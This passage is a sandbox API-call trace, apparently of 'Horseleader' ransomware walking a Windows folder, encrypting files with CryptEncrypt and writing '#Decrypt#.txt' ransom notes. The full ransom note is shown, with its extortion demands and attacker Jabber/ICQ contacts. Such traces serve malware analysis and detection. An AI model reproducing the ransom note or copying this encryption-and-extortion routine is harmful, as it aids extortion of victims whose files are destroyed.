nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0233.998] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0233.998] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0233.998] CloseHandle (hObject=0x158) returned 1 [0233.998] GetProcessHeap () returned 0x780000 [0233.998] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0233.998] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ece8572, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2ece8572, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2ea60e45, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0233.998] lstrcmpiW (lpString1="hwrcommonlm.dat", lpString2="Windows") returned -1 [0233.998] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat") returned 70 [0233.998] StrStrIW (lpFirst="hwrcommonlm.dat", lpSrch=".horseleader") returned 0x0 [0233.998] lstrcmpW (lpString1="hwrcommonlm.dat", lpString2="#Decrypt#.txt") returned 1 [0233.999] lstrcmpW (lpString1="hwrcommonlm.dat", lpString2="_uninstalling_.png") returned 1 [0233.999] lstrlenW (lpString=".testttjffg") returned 11 [0233.999] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", lpSrch=".testttjffg") returned 0x0 [0233.999] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0233.999] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0233.999] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.999] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="HWRCustomization", cAlternateFileName="HWRCUS~1")) returned 1 [0233.999] lstrcmpiW (lpString1="HWRCustomization", lpString2="Windows") returned -1 [0233.999] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization") returned 71 [0233.999] lstrcmpW (lpString1="HWRCustomization", lpString2=".") returned 1 [0233.999] lstrcmpW (lpString1="HWRCustomization", lpString2="..") returned 1 [0233.999] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.999] GetProcessHeap () returned 0x780000 [0233.999] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0233.999] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*") returned 73 [0234.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.006] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.006] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\.") returned 73 [0234.006] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.006] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.006] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.007] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\..") returned 74 [0234.007] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.007] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.007] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 0 [0234.007] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.007] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\#Decrypt#.txt") returned 85 [0234.007] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcustomization\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.008] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.008] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.009] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.009] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.009] CloseHandle (hObject=0x158) returned 1 [0234.009] GetProcessHeap () returned 0x780000 [0234.009] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.010] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f7eaa54, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2f7eaa54, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2f301d57, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb6710, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwrenalm.dat", cAlternateFileName="")) returned 1 [0234.010] lstrcmpiW (lpString1="hwrenalm.dat", lpString2="Windows") returned -1 [0234.010] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat") returned 67 [0234.010] StrStrIW (lpFirst="hwrenalm.dat", lpSrch=".horseleader") returned 0x0 [0234.010] lstrcmpW (lpString1="hwrenalm.dat", lpString2="#Decrypt#.txt") returned 1 [0234.010] lstrcmpW (lpString1="hwrenalm.dat", lpString2="_uninstalling_.png") returned 1 [0234.010] lstrlenW (lpString=".testttjffg") returned 11 [0234.010] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", lpSrch=".testttjffg") returned 0x0 [0234.011] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.011] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.011] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.022] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33535c00, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x33535c00, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x332fa78d, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xc7240, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0234.022] lstrcmpiW (lpString1="hwrenclm.dat", lpString2="Windows") returned -1 [0234.023] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat") returned 67 [0234.023] StrStrIW (lpFirst="hwrenclm.dat", lpSrch=".horseleader") returned 0x0 [0234.023] lstrcmpW (lpString1="hwrenclm.dat", lpString2="#Decrypt#.txt") returned 1 [0234.023] lstrcmpW (lpString1="hwrenclm.dat", lpString2="_uninstalling_.png") returned 1 [0234.023] lstrlenW (lpString=".testttjffg") returned 11 [0234.023] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", lpSrch=".testttjffg") returned 0x0 [0234.023] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.023] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.023] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.023] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bd661d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x32bd661d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x32a7f9d8, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x10ca50, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwrlatinlm.dat", cAlternateFileName="")) returned 1 [0234.023] lstrcmpiW (lpString1="hwrlatinlm.dat", lpString2="Windows") returned -1 [0234.023] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat") returned 69 [0234.023] StrStrIW (lpFirst="hwrlatinlm.dat", lpSrch=".horseleader") returned 0x0 [0234.024] lstrcmpW (lpString1="hwrlatinlm.dat", lpString2="#Decrypt#.txt") returned 1 [0234.024] lstrcmpW (lpString1="hwrlatinlm.dat", lpString2="_uninstalling_.png") returned 1 [0234.024] lstrlenW (lpString=".testttjffg") returned 11 [0234.024] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", lpSrch=".testttjffg") returned 0x0 [0234.024] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.024] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.024] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.024] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d94dbb3, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3d94dbb3, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3c28ab1e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x2e99a0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwruklm.dat", cAlternateFileName="")) returned 1 [0234.024] lstrcmpiW (lpString1="hwruklm.dat", lpString2="Windows") returned -1 [0234.024] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat") returned 66 [0234.024] StrStrIW (lpFirst="hwruklm.dat", lpSrch=".horseleader") returned 0x0 [0234.024] lstrcmpW (lpString1="hwruklm.dat", lpString2="#Decrypt#.txt") returned 1 [0234.024] lstrcmpW (lpString1="hwruklm.dat", lpString2="_uninstalling_.png") returned 1 [0234.024] lstrlenW (lpString=".testttjffg") returned 11 [0234.024] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat", lpSrch=".testttjffg") returned 0x0 [0234.024] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.024] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.025] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.033] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da5853e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3da5853e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d7f6f6e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x21ff00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwruksh.dat", cAlternateFileName="")) returned 1 [0234.033] lstrcmpiW (lpString1="hwruksh.dat", lpString2="Windows") returned -1 [0234.033] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat") returned 66 [0234.033] StrStrIW (lpFirst="hwruksh.dat", lpSrch=".horseleader") returned 0x0 [0234.033] lstrcmpW (lpString1="hwruksh.dat", lpString2="#Decrypt#.txt") returned 1 [0234.033] lstrcmpW (lpString1="hwruksh.dat", lpString2="_uninstalling_.png") returned 1 [0234.033] lstrlenW (lpString=".testttjffg") returned 11 [0234.033] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat", lpSrch=".testttjffg") returned 0x0 [0234.033] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.034] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.034] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.034] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3db89026, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3db89026, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d3cc942, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x30c330, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwrusalm.dat", cAlternateFileName="")) returned 1 [0234.034] lstrcmpiW (lpString1="hwrusalm.dat", lpString2="Windows") returned -1 [0234.034] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat") returned 67 [0234.034] StrStrIW (lpFirst="hwrusalm.dat", lpSrch=".horseleader") returned 0x0 [0234.034] lstrcmpW (lpString1="hwrusalm.dat", lpString2="#Decrypt#.txt") returned 1 [0234.034] lstrcmpW (lpString1="hwrusalm.dat", lpString2="_uninstalling_.png") returned 1 [0234.034] lstrlenW (lpString=".testttjffg") returned 11 [0234.034] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat", lpSrch=".testttjffg") returned 0x0 [0234.034] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.034] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.034] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.152] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dbfb43d, ftCreationTime.dwHighDateTime=0x1ca03fa, 